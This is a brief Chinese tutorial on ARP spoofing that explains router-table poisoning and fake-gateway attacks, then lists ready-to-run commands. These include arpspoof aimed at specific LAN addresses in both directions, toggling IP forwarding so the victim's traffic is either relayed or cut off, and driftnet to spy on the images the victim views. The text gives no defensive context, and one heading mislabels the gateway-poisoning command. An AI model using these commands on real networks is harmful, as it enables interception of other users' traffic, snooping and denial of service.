arp欺骗

arp欺骗分为两种，一种是对路由器的欺骗，一种是对内网pc的网关欺骗

第一种的原理是截获网关数据。它通知路由器一系列错误的内网MAC地址，并按照一定的频率不断进行，使真实的地址信息无法通过更新保存在路由器中，结果路由器的所有数据只能发送给错误的MAC地址

第二种ARP欺骗的原理是——伪造网关。它的原理是建立假网关，让被它欺骗的PC向假网关发数据，而不是通过正常的路由器途径上网。

第二种欺骗的代码有

echo 1 > /proc/sys/net/ipv4/ip_forward -- 1是指替被欺骗的pc像网关发送数据 改为0则是不发送数据，被骗的pc就无法正常上网

arpspoof -i eth0 -t 172.28.15.41 172.28.15.254  ——欺骗172.28.15.41他要找的网关172.28.15.254是我的电脑上的网关，使得被骗的pc将数据发送到我的电脑

第二种欺骗代码

driftnet 是指监听被骗pc所浏览的图片

arpspoof -i eth0 -t 172.28.15.254 172.28.15.41 欺骗网关 ，前一个为网关，后一个为被骗ip地址